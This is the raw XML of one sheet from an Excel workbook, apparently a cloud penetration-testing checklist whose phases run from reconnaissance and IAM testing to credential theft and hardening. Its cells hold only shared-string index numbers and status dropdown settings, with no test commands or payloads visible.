  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="22" customWidth="1"/>
    <col min="2" max="3" width="38" customWidth="1"/>
    <col min="4" max="4" width="28" customWidth="1"/>
    <col min="5" max="5" width="14" customWidth="1"/>
    <col min="6" max="6" width="18" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A1" s="39" t="s">
        <v>409</v>
      </c>
      <c r="B1" s="29"/>
      <c r="C1" s="29"/>
      <c r="D1" s="29"/>
      <c r="E1" s="29"/>
      <c r="F1" s="29"/>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A2" s="11" t="s">
        <v>88</v>
      </c>
      <c r="B2" s="11" t="s">
        <v>89</v>
      </c>
      <c r="C2" s="11" t="s">
        <v>18</v>
      </c>
      <c r="D2" s="11" t="s">
        <v>91</v>
      </c>
      <c r="E2" s="11" t="s">
        <v>94</v>
      </c>
      <c r="F2" s="11" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A3" s="38" t="s">
        <v>87</v>
      </c>
      <c r="B3" s="29"/>
      <c r="C3" s="29"/>
      <c r="D3" s="29"/>
      <c r="E3" s="29"/>
      <c r="F3" s="29"/>
    </row>
    <row r="4" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>96</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>97</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>411</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>412</v>
      </c>
      <c r="E4" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F4" s="13"/>
    </row>
    <row r="5" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>102</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>413</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>414</v>
      </c>
      <c r="D5" s="5" t="s">
        <v>415</v>
      </c>
      <c r="E5" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F5" s="14"/>
    </row>
    <row r="6" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>108</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>416</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>417</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>418</v>
      </c>
      <c r="E6" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F6" s="13"/>
    </row>
    <row r="7" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>114</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>419</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>420</v>
      </c>
      <c r="D7" s="5" t="s">
        <v>421</v>
      </c>
      <c r="E7" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F7" s="14"/>
    </row>
    <row r="8" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A8" s="7" t="s">
        <v>120</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>422</v>
      </c>
      <c r="C8" s="9" t="s">
        <v>423</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>123</v>
      </c>
      <c r="E8" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F8" s="13"/>
    </row>
    <row r="9" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="10" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A10" s="38" t="s">
        <v>424</v>
      </c>
      <c r="B10" s="29"/>
      <c r="C10" s="29"/>
      <c r="D10" s="29"/>
      <c r="E10" s="29"/>
      <c r="F10" s="29"/>
    </row>
    <row r="11" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A11" s="2" t="s">
        <v>127</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>128</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>425</v>
      </c>
      <c r="D11" s="5" t="s">
        <v>130</v>
      </c>
      <c r="E11" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F11" s="14"/>
    </row>
    <row r="12" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A12" s="7" t="s">
        <v>133</v>
      </c>
      <c r="B12" s="8" t="s">
        <v>134</v>
      </c>
      <c r="C12" s="9" t="s">
        <v>426</v>
      </c>
      <c r="D12" s="10" t="s">
        <v>427</v>
      </c>
      <c r="E12" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F12" s="13"/>
    </row>
    <row r="13" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A13" s="2" t="s">
        <v>139</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>428</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>429</v>
      </c>
      <c r="D13" s="5" t="s">
        <v>142</v>
      </c>
      <c r="E13" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F13" s="14"/>
    </row>
    <row r="14" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A14" s="7" t="s">
        <v>145</v>
      </c>
      <c r="B14" s="8" t="s">
        <v>430</v>
      </c>
      <c r="C14" s="9" t="s">
        <v>431</v>
      </c>
      <c r="D14" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E14" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F14" s="13"/>
    </row>
    <row r="15" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>151</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>432</v>
      </c>
      <c r="C15" s="4" t="s">
        <v>433</v>
      </c>
      <c r="D15" s="5" t="s">
        <v>434</v>
      </c>
      <c r="E15" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F15" s="14"/>
    </row>
    <row r="16" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A16" s="7" t="s">
        <v>157</v>
      </c>
      <c r="B16" s="8" t="s">
        <v>158</v>
      </c>
      <c r="C16" s="9" t="s">
        <v>435</v>
      </c>
      <c r="D16" s="10" t="s">
        <v>160</v>
      </c>
      <c r="E16" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F16" s="13"/>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A17" s="2" t="s">
        <v>163</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>436</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>437</v>
      </c>
      <c r="D17" s="5" t="s">
        <v>438</v>
      </c>
      <c r="E17" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F17" s="14"/>
    </row>
    <row r="18" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="19" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A19" s="38" t="s">
        <v>439</v>
      </c>
      <c r="B19" s="29"/>
      <c r="C19" s="29"/>
      <c r="D19" s="29"/>
      <c r="E19" s="29"/>
      <c r="F19" s="29"/>
    </row>
    <row r="20" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A20" s="7" t="s">
        <v>170</v>
      </c>
      <c r="B20" s="8" t="s">
        <v>440</v>
      </c>
      <c r="C20" s="9" t="s">
        <v>441</v>
      </c>
      <c r="D20" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E20" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F20" s="13"/>
    </row>
    <row r="21" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A21" s="2" t="s">
        <v>175</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>442</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>443</v>
      </c>
      <c r="D21" s="5" t="s">
        <v>178</v>
      </c>
      <c r="E21" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F21" s="14"/>
    </row>
    <row r="22" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A22" s="7" t="s">
        <v>181</v>
      </c>
      <c r="B22" s="8" t="s">
        <v>444</v>
      </c>
      <c r="C22" s="9" t="s">
        <v>445</v>
      </c>
      <c r="D22" s="10" t="s">
        <v>184</v>
      </c>
      <c r="E22" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F22" s="13"/>
    </row>
    <row r="23" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A23" s="2" t="s">
        <v>187</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>446</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>447</v>
      </c>
      <c r="D23" s="5" t="s">
        <v>448</v>
      </c>
      <c r="E23" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F23" s="14"/>
    </row>
    <row r="24" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A24" s="7" t="s">
        <v>193</v>
      </c>
      <c r="B24" s="8" t="s">
        <v>449</v>
      </c>
      <c r="C24" s="9" t="s">
        <v>450</v>
      </c>
      <c r="D24" s="10" t="s">
        <v>196</v>
      </c>
      <c r="E24" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F24" s="13"/>
    </row>
    <row r="25" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A25" s="2" t="s">
        <v>199</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>451</v>
      </c>
      <c r="C25" s="4" t="s">
        <v>452</v>
      </c>
      <c r="D25" s="5" t="s">
        <v>453</v>
      </c>
      <c r="E25" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F25" s="14"/>
    </row>
    <row r="26" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A26" s="7" t="s">
        <v>205</v>
      </c>
      <c r="B26" s="8" t="s">
        <v>454</v>
      </c>
      <c r="C26" s="9" t="s">
        <v>455</v>
      </c>
      <c r="D26" s="10" t="s">
        <v>208</v>
      </c>
      <c r="E26" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F26" s="13"/>
    </row>
    <row r="27" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="28" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A28" s="38" t="s">
        <v>456</v>
      </c>
      <c r="B28" s="29"/>
      <c r="C28" s="29"/>
      <c r="D28" s="29"/>
      <c r="E28" s="29"/>
      <c r="F28" s="29"/>
    </row>
    <row r="29" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A29" s="2" t="s">
        <v>212</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>457</v>
      </c>
      <c r="C29" s="4" t="s">
        <v>458</v>
      </c>
      <c r="D29" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E29" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F29" s="14"/>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A30" s="7" t="s">
        <v>218</v>
      </c>
      <c r="B30" s="8" t="s">
        <v>459</v>
      </c>
      <c r="C30" s="9" t="s">
        <v>460</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E30" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F30" s="13"/>
    </row>
    <row r="31" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A31" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>461</v>
      </c>
      <c r="C31" s="4" t="s">
        <v>462</v>
      </c>
      <c r="D31" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E31" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F31" s="14"/>
    </row>
    <row r="32" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A32" s="7" t="s">
        <v>228</v>
      </c>
      <c r="B32" s="8" t="s">
        <v>463</v>
      </c>
      <c r="C32" s="9" t="s">
        <v>464</v>
      </c>
      <c r="D32" s="10" t="s">
        <v>231</v>
      </c>
      <c r="E32" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F32" s="13"/>
    </row>
    <row r="33" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A33" s="2" t="s">
        <v>234</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>465</v>
      </c>
      <c r="C33" s="4" t="s">
        <v>466</v>
      </c>
      <c r="D33" s="5" t="s">
        <v>237</v>
      </c>
      <c r="E33" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F33" s="14"/>
    </row>
    <row r="34" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="35" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A35" s="38" t="s">
        <v>467</v>
      </c>
      <c r="B35" s="29"/>
      <c r="C35" s="29"/>
      <c r="D35" s="29"/>
      <c r="E35" s="29"/>
      <c r="F35" s="29"/>
    </row>
    <row r="36" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A36" s="7" t="s">
        <v>241</v>
      </c>
      <c r="B36" s="8" t="s">
        <v>468</v>
      </c>
      <c r="C36" s="9" t="s">
        <v>469</v>
      </c>
      <c r="D36" s="10" t="s">
        <v>45</v>
      </c>
      <c r="E36" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F36" s="13"/>
    </row>
    <row r="37" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A37" s="2" t="s">
        <v>246</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>470</v>
      </c>
      <c r="C37" s="4" t="s">
        <v>471</v>
      </c>
      <c r="D37" s="5" t="s">
        <v>249</v>
      </c>
      <c r="E37" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F37" s="14"/>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A38" s="7" t="s">
        <v>252</v>
      </c>
      <c r="B38" s="8" t="s">
        <v>472</v>
      </c>
      <c r="C38" s="9" t="s">
        <v>473</v>
      </c>
      <c r="D38" s="10" t="s">
        <v>255</v>
      </c>
      <c r="E38" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F38" s="13"/>
    </row>
    <row r="39" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A39" s="2" t="s">
        <v>258</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>474</v>
      </c>
      <c r="C39" s="4" t="s">
        <v>475</v>
      </c>
      <c r="D39" s="5" t="s">
        <v>142</v>
      </c>
      <c r="E39" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F39" s="14"/>
    </row>
    <row r="40" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A40" s="7" t="s">
        <v>263</v>
      </c>
      <c r="B40" s="8" t="s">
        <v>476</v>
      </c>
      <c r="C40" s="9" t="s">
        <v>477</v>
      </c>
      <c r="D40" s="10" t="s">
        <v>266</v>
      </c>
      <c r="E40" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F40" s="13"/>
    </row>
    <row r="41" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="42" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A42" s="38" t="s">
        <v>478</v>
      </c>
      <c r="B42" s="29"/>
      <c r="C42" s="29"/>
      <c r="D42" s="29"/>
      <c r="E42" s="29"/>
      <c r="F42" s="29"/>
    </row>
    <row r="43" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A43" s="2" t="s">
        <v>270</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>479</v>
      </c>
      <c r="C43" s="4" t="s">
        <v>480</v>
      </c>
      <c r="D43" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E43" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F43" s="14"/>
    </row>
    <row r="44" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A44" s="7" t="s">
        <v>275</v>
      </c>
      <c r="B44" s="8" t="s">
        <v>481</v>
      </c>
      <c r="C44" s="9" t="s">
        <v>482</v>
      </c>
      <c r="D44" s="10" t="s">
        <v>278</v>
      </c>
      <c r="E44" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F44" s="13"/>
    </row>
    <row r="45" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A45" s="2" t="s">
        <v>281</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>483</v>
      </c>
      <c r="C45" s="4" t="s">
        <v>484</v>
      </c>
      <c r="D45" s="5" t="s">
        <v>284</v>
      </c>
      <c r="E45" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F45" s="14"/>
    </row>
    <row r="46" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A46" s="7" t="s">
        <v>287</v>
      </c>
      <c r="B46" s="8" t="s">
        <v>485</v>
      </c>
      <c r="C46" s="9" t="s">
        <v>486</v>
      </c>
      <c r="D46" s="10" t="s">
        <v>290</v>
      </c>
      <c r="E46" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F46" s="13"/>
    </row>
    <row r="47" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A47" s="2" t="s">
        <v>293</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>487</v>
      </c>
      <c r="C47" s="4" t="s">
        <v>488</v>
      </c>
      <c r="D47" s="5" t="s">
        <v>290</v>
      </c>
      <c r="E47" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F47" s="14"/>
    </row>
    <row r="48" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A48" s="7" t="s">
        <v>298</v>
      </c>
      <c r="B48" s="8" t="s">
        <v>489</v>
      </c>
      <c r="C48" s="9" t="s">
        <v>490</v>
      </c>
      <c r="D48" s="10" t="s">
        <v>160</v>
      </c>
      <c r="E48" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F48" s="13"/>
    </row>
    <row r="49" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="50" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A50" s="38" t="s">
        <v>491</v>
      </c>
      <c r="B50" s="29"/>
      <c r="C50" s="29"/>
      <c r="D50" s="29"/>
      <c r="E50" s="29"/>
      <c r="F50" s="29"/>
    </row>
    <row r="51" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A51" s="2" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>492</v>
      </c>
      <c r="C51" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D51" s="5" t="s">
        <v>307</v>
      </c>
      <c r="E51" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F51" s="14"/>
    </row>
    <row r="52" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A52" s="7" t="s">
        <v>310</v>
      </c>
      <c r="B52" s="8" t="s">
        <v>494</v>
      </c>
      <c r="C52" s="9" t="s">
        <v>495</v>
      </c>
      <c r="D52" s="10" t="s">
        <v>496</v>
      </c>
      <c r="E52" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F52" s="13"/>
    </row>
    <row r="53" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A53" s="2" t="s">
        <v>316</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>497</v>
      </c>
      <c r="C53" s="4" t="s">
        <v>498</v>
      </c>
      <c r="D53" s="5" t="s">
        <v>499</v>
      </c>
      <c r="E53" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F53" s="14"/>
    </row>
    <row r="54" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="55" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A55" s="38" t="s">
        <v>500</v>
      </c>
      <c r="B55" s="29"/>
      <c r="C55" s="29"/>
      <c r="D55" s="29"/>
      <c r="E55" s="29"/>
      <c r="F55" s="29"/>
    </row>
    <row r="56" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A56" s="7" t="s">
        <v>323</v>
      </c>
      <c r="B56" s="8" t="s">
        <v>501</v>
      </c>
      <c r="C56" s="9" t="s">
        <v>502</v>
      </c>
      <c r="D56" s="10" t="s">
        <v>326</v>
      </c>
      <c r="E56" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F56" s="13"/>
    </row>
    <row r="57" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A57" s="2" t="s">
        <v>329</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>503</v>
      </c>
      <c r="C57" s="4" t="s">
        <v>504</v>
      </c>
      <c r="D57" s="5" t="s">
        <v>284</v>
      </c>
      <c r="E57" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F57" s="14"/>
    </row>
    <row r="58" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A58" s="7" t="s">
        <v>334</v>
      </c>
      <c r="B58" s="8" t="s">
        <v>335</v>
      </c>
      <c r="C58" s="9" t="s">
        <v>505</v>
      </c>
      <c r="D58" s="10" t="s">
        <v>506</v>
      </c>
      <c r="E58" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F58" s="13"/>
    </row>
    <row r="59" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A59" s="2" t="s">
        <v>340</v>
      </c>
      <c r="B59" s="3" t="s">
        <v>507</v>
      </c>
      <c r="C59" s="4" t="s">
        <v>508</v>
      </c>
      <c r="D59" s="5" t="s">
        <v>278</v>
      </c>
      <c r="E59" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F59" s="14"/>
    </row>
    <row r="60" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A60" s="7" t="s">
        <v>346</v>
      </c>
      <c r="B60" s="8" t="s">
        <v>509</v>
      </c>
      <c r="C60" s="9" t="s">
        <v>510</v>
      </c>
      <c r="D60" s="10" t="s">
        <v>231</v>
      </c>
      <c r="E60" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F60" s="13"/>
    </row>
    <row r="61" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="62" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A62" s="38" t="s">
        <v>511</v>
      </c>
      <c r="B62" s="29"/>
      <c r="C62" s="29"/>
      <c r="D62" s="29"/>
      <c r="E62" s="29"/>
      <c r="F62" s="29"/>
    </row>
    <row r="63" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A63" s="2" t="s">
        <v>352</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>512</v>
      </c>
      <c r="C63" s="4" t="s">
        <v>513</v>
      </c>
      <c r="D63" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E63" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F63" s="14"/>
    </row>
    <row r="64" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A64" s="7" t="s">
        <v>357</v>
      </c>
      <c r="B64" s="8" t="s">
        <v>514</v>
      </c>
      <c r="C64" s="9" t="s">
        <v>515</v>
      </c>
      <c r="D64" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E64" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F64" s="13"/>
    </row>
    <row r="65" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A65" s="2" t="s">
        <v>362</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>363</v>
      </c>
      <c r="C65" s="4" t="s">
        <v>516</v>
      </c>
      <c r="D65" s="5" t="s">
        <v>148</v>
      </c>
      <c r="E65" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F65" s="14"/>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A66" s="7" t="s">
        <v>367</v>
      </c>
      <c r="B66" s="8" t="s">
        <v>517</v>
      </c>
      <c r="C66" s="9" t="s">
        <v>518</v>
      </c>
      <c r="D66" s="10" t="s">
        <v>148</v>
      </c>
      <c r="E66" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F66" s="13"/>
    </row>
    <row r="67" spans="1:6" ht="19.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="68" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A68" s="38" t="s">
        <v>519</v>
      </c>
      <c r="B68" s="29"/>
      <c r="C68" s="29"/>
      <c r="D68" s="29"/>
      <c r="E68" s="29"/>
      <c r="F68" s="29"/>
    </row>
    <row r="69" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A69" s="2" t="s">
        <v>373</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>520</v>
      </c>
      <c r="C69" s="4" t="s">
        <v>521</v>
      </c>
      <c r="D69" s="5" t="s">
        <v>522</v>
      </c>
      <c r="E69" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F69" s="14"/>
    </row>
    <row r="70" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A70" s="7" t="s">
        <v>379</v>
      </c>
      <c r="B70" s="8" t="s">
        <v>523</v>
      </c>
      <c r="C70" s="9" t="s">
        <v>524</v>
      </c>
      <c r="D70" s="10" t="s">
        <v>522</v>
      </c>
      <c r="E70" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F70" s="13"/>
    </row>
    <row r="71" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A71" s="2" t="s">
        <v>385</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>525</v>
      </c>
      <c r="C71" s="4" t="s">
        <v>526</v>
      </c>
      <c r="D71" s="5" t="s">
        <v>522</v>
      </c>
      <c r="E71" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F71" s="14"/>
    </row>
    <row r="72" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A72" s="7" t="s">
        <v>391</v>
      </c>
      <c r="B72" s="8" t="s">
        <v>527</v>
      </c>
      <c r="C72" s="9" t="s">
        <v>528</v>
      </c>
      <c r="D72" s="10" t="s">
        <v>394</v>
      </c>
      <c r="E72" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F72" s="13"/>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A73" s="2" t="s">
        <v>397</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>529</v>
      </c>
      <c r="C73" s="4" t="s">
        <v>530</v>
      </c>
      <c r="D73" s="5" t="s">
        <v>531</v>
      </c>
      <c r="E73" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F73" s="14"/>
    </row>
    <row r="74" spans="1:6" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A74" s="7" t="s">
        <v>403</v>
      </c>
      <c r="B74" s="8" t="s">
        <v>404</v>
      </c>
      <c r="C74" s="9" t="s">
        <v>532</v>
      </c>
      <c r="D74" s="10" t="s">
        <v>406</v>
      </c>
      <c r="E74" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F74" s="13"/>
    </row>
  </sheetData>
  <mergeCells count="11">
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="A35:F35"/>
    <mergeCell ref="A50:F50"/>
    <mergeCell ref="A62:F62"/>
    <mergeCell ref="A3:F3"/>
    <mergeCell ref="A55:F55"/>
    <mergeCell ref="A10:F10"/>
    <mergeCell ref="A28:F28"/>
    <mergeCell ref="A42:F42"/>
    <mergeCell ref="A19:F19"/>
    <mergeCell ref="A68:F68"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="list" sqref="E3:E74" xr:uid="{00000000-0002-0000-0B00-000000000000}">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs 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📋 Dashboard</vt:lpstr>
      <vt:lpstr>Phase 1 - Recon</vt:lpstr>
      <vt:lpstr>Phase 2 - IAM Testing</vt:lpstr>
      <vt:lpstr>Phase 3 - Compute &amp; Network</vt:lpstr>
      <vt:lpstr>Phase 4 - Storage Security</vt:lpstr>
      <vt:lpstr>Phase 5 - Credential Theft</vt:lpstr>
      <vt:lpstr>Phase 6 - Platform Attacks</vt:lpstr>
      <vt:lpstr>Phase 7 - Advanced Identity</vt:lpstr>
      <vt:lpstr>Phase 8 - Serverless</vt:lpstr>
      <vt:lpstr>Phase 9 - Logging &amp; Monitoring</vt:lpstr>
      <vt:lpstr>Phase 10 - Hardening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Riaz</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-28T09:27:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-29T05:19:56Z</dcterms:modified>
</cp:coreProperties>
</file>